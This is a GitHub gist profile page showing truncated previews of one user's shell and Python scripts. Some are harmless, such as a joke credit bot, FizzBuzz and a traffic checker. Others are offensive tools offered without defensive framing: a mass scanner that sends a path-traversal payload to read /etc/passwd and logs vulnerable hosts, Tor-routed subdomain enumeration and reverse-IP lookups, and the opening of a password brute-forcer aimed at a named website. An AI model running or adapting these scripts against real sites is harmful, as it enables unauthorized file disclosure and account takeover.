Skip to content

Instantly share code, notes, and snippets.

View meicookies's full-sized avatar
💭
Fuck Society

meicookies

💭
Fuck Society
View GitHub Profile
#!/bin/bash
if [ -z $1 ]; then echo "plz"; exit; fi
url="https://akira-api.herokuapp.com/api/subdomainscan?q="; api=()
for site in $(cat $1); do
apa_ni=$(api+=($url); api+=($(basename $site)); echo ${api[@]}; unset api) # wkwkwk
killall -HUP tor; curl -s --socks5 127.0.0.1:9050 ${apa_ni/[[:blank:]]/} | jq -r '.result[] .hasil' &
done; wait; echo "All Done"
#!/bin/bash
scan() {
common_dir=("cgi-bin" "assets" "icons" "uploads" "img" "image")
payload=".%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
for dir in ${common_dir[@]}; do
get=$(curl --max-time 2 -s --path-as-is "$1$dir/$payload" | grep "root:x")
if [[ -n $get ]]; then
echo "$1 vulnerable"
echo "$1" >> result
else
@meicookies
meicookies / social_credit.sh
Last active October 18, 2021 05:10
Bot social credit
get() {
credit=0
wallet=()
until [ $credit -ge $1 ]; do
[[ $credit -ge $1 ]] && break
social=$(( RANDOM % $1 ))
credit=$(( $credit + $social ))
echo "[+] You have earned: $credit Social credits"
sleep 1
wallet+=($credit)
#!/bin/bash
[[ -z $1 ]] && echo -e "$0 [sites]" && exit
domain=$(basename $1)
url=$(curl -w "%{http_code}\n" -s $domain -o /dev/null)
statshow="https://www.statshow.com/www"
if [[ $url -ne 000 ]]; then
result=$(curl -s $statshow/$domain \
| htmlq --pretty | grep Daily | htmlq --text span \
| head -n 2 | tail -n 1 2>/dev/null)
echo "$domain"
@meicookies
meicookies / iseng.py
Last active December 12, 2021 23:44
python rasa bash script
#!/usr/bin/python3
import sys
from subprocess import PIPE, STDOUT, Popen
cmd = lambda command: Popen(
command, shell=True,
stdin=None,
stdout=PIPE,
stderr=STDOUT,
close_fds=True,
@meicookies
meicookies / rev.sh
Created December 31, 2021 05:35
fastest reverse ip unlimited
#!/bin/bash
# cod3d by ./meicookies
scan() {
domain=$(basename $1)
date=$(date | awk '{print $4}')
ip=$(dig +short $domain | head -n 1)
if [[ -n $ip ]]
then
resp=$(curl -m 3 -s http://reverse.fay.gg:18/?ip=$ip | jq -r '.data .domain[]' 2>/dev/null)
echo "$resp" >> result.txt
"""
It's Python!...but without any control flow statements except for try-except, and no ways to loop except recursion!
Why does this exist???
"""
def FizzBuzz(start, end):
try:
0 / end
result = ""
try:
0 / (start % 3)
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
https://osu.ppy.sh/beatmapsets/20989
https://osu.ppy.sh/beatmapsets/1286287
https://osu.ppy.sh/beatmapsets/320194
https://osu.ppy.sh/beatmapsets/2184
https://osu.ppy.sh/beatmapsets/409025
https://osu.ppy.sh/beatmapsets/16161
https://osu.ppy.sh/beatmapsets/12570
https://osu.ppy.sh/beatmapsets/1142364
https://osu.ppy.sh/beatmapsets/15932
https://osu.ppy.sh/beatmapsets/1201058
@meicookies
meicookies / main.py
Last active July 12, 2022 21:23
control-c.com brute force password
# coded by ./meicookies
import requests as req
from bs4 import BeautifulSoup as bs
import base64, os, time
def clean():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')